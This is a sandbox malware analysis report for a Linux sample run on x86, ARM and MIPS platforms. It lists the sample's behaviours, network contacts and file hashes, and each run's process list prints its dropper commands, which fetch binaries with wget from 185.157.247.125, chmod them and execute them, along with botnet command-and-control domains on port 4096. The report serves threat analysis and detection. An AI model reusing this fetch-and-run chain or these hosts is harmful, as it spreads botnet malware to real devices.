Analysis Overview
SHA256
d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0
Threat Level: Shows suspicious behavior
The file d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Deletes itself
Unexpected DNS network traffic destination
Enumerates running processes
Reads process memory
Changes its process name
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 03:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
| N/A | /tmp/empsl | /tmp/empsl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/empsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 151.101.129.91:443 | tcp | |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| GB | 89.187.167.2:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
/tmp/earm5
| MD5 | 17b0ebeb1226ffff541eb2551cc542ae |
| SHA1 | f08a0c96f0ec5df5e5de2f399ef319e514fa799e |
| SHA256 | 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9 |
| SHA512 | 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a |
/tmp/earm7
| MD5 | 521069251bdce0fbd37497b8f527ab23 |
| SHA1 | 020730190edde76dec3de9678351aa6e65ab91bf |
| SHA256 | aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72 |
| SHA512 | 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70 |
/tmp/emips
| MD5 | c0b34d8a59f793b636b5424b8e96a64a |
| SHA1 | d5eac6c7b3a5953ffcd642de9db2cd1c45463e96 |
| SHA256 | defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270 |
| SHA512 | 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4 |
/tmp/empsl
| MD5 | 3cfc76868e26201ac03e0583b7c8aaba |
| SHA1 | 03436d9d090e1f944fecf60adc1e45f90df20c26 |
| SHA256 | 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d |
| SHA512 | 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/earm | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 195.10.195.195 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
| Destination IP | 168.138.12.137 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
| Destination IP | 38.103.195.4 | N/A | N/A |
| Destination IP | 81.169.136.222 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/302/maps | /tmp/earm | N/A |
| File opened for reading | /proc/305/maps | /tmp/earm | N/A |
| File opened for reading | /proc/461/maps | /tmp/earm | N/A |
| File opened for reading | /proc/462/maps | /tmp/earm | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/earm | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/605/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/734/status | /tmp/earm | N/A |
| File opened for reading | /proc/772/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/975/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1020/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1195/status | /tmp/earm | N/A |
| File opened for reading | /proc/1233/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/137/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/778/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1218/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/690/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/758/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1044/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1141/status | /tmp/earm | N/A |
| File opened for reading | /proc/1266/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1280/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1347/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1349/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1393/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/738/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/873/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/913/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/966/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/972/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1051/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/772/status | /tmp/earm | N/A |
| File opened for reading | /proc/776/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/914/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1217/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1423/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/711/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/961/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1169/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1221/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1282/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/689/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/877/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1007/status | /tmp/earm | N/A |
| File opened for reading | /proc/1017/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1254/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/686/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/701/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/733/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/828/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1023/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1055/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1171/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1330/status | /tmp/earm | N/A |
| File opened for reading | /proc/764/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1002/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1111/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1130/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1162/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1381/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/23/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1110/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1191/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1212/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/1256/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/714/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/752/cmdline | /tmp/earm | N/A |
| File opened for reading | /proc/922/cmdline | /tmp/earm | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 168.235.111.72:53 | trump2024.oss | udp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| DE | 195.10.195.195:53 | liberalretard.libre | udp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| AU | 168.138.12.137:53 | trump2024.oss | udp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| US | 168.235.111.72:53 | trump2024.oss | udp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| CA | 38.103.195.4:53 | liberalretard.libre | udp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| DE | 81.169.136.222:53 | trump2024.oss | udp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| US | 1.1.1.1:53 | xaiverbot.net | udp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/emips | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 138.197.140.189 | N/A | N/A |
| Destination IP | 51.77.149.139 | N/A | N/A |
| Destination IP | 9.9.9.9 | N/A | N/A |
| Destination IP | 162.243.19.47 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/383/maps | /tmp/emips | N/A |
| File opened for reading | /proc/385/maps | /tmp/emips | N/A |
| File opened for reading | /proc/679/maps | /tmp/emips | N/A |
| File opened for reading | /proc/680/maps | /tmp/emips | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/emips | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/848/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/865/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/929/status | /tmp/emips | N/A |
| File opened for reading | /proc/961/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/992/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1041/status | /tmp/emips | N/A |
| File opened for reading | /proc/1233/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/796/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/897/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/971/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1068/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1156/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1163/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/770/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1072/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1162/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1231/status | /tmp/emips | N/A |
| File opened for reading | /proc/862/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1007/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1023/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1194/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/788/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/894/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1044/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1059/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1065/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1094/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1282/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/418/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/934/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1033/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1109/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1116/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1118/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1203/status | /tmp/emips | N/A |
| File opened for reading | /proc/1222/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/881/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/880/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/939/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1096/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1141/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1293/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/801/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1235/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1264/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/804/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/853/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/810/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/929/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1010/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1125/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/704/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/834/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1022/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1138/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1153/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/776/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/920/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/982/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/997/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1081/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1170/cmdline | /tmp/emips | N/A |
| File opened for reading | /proc/1211/cmdline | /tmp/emips | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 162.243.19.47:53 | liberalretard.libre | udp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| CA | 138.197.140.189:53 | liberalretard.libre | udp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| CH | 9.9.9.9:53 | xaiverbot.net | udp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| GB | 45.95.18.100:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| FR | 51.77.149.139:53 | trump2024.oss | udp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
/tmp/earm5
| MD5 | 17b0ebeb1226ffff541eb2551cc542ae |
| SHA1 | f08a0c96f0ec5df5e5de2f399ef319e514fa799e |
| SHA256 | 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9 |
| SHA512 | 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a |
/tmp/earm7
| MD5 | 521069251bdce0fbd37497b8f527ab23 |
| SHA1 | 020730190edde76dec3de9678351aa6e65ab91bf |
| SHA256 | aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72 |
| SHA512 | 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70 |
/tmp/emips
| MD5 | c0b34d8a59f793b636b5424b8e96a64a |
| SHA1 | d5eac6c7b3a5953ffcd642de9db2cd1c45463e96 |
| SHA256 | defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270 |
| SHA512 | 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-mipsel-20240611-en
Max time kernel
141s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/empsl | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
| N/A | /tmp/empsl | /tmp/empsl | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 103.1.206.179 | N/A | N/A |
| Destination IP | 9.9.9.9 | N/A | N/A |
| Destination IP | 162.243.19.47 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/668/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/669/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/370/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/371/maps | /tmp/empsl | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/empsl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/781/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/857/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1464/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/949/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1308/cmdline | /tmp/empsl | N/A |
| File opened for reading | /proc/1485/cmdline | /tmp/empsl | N/A |
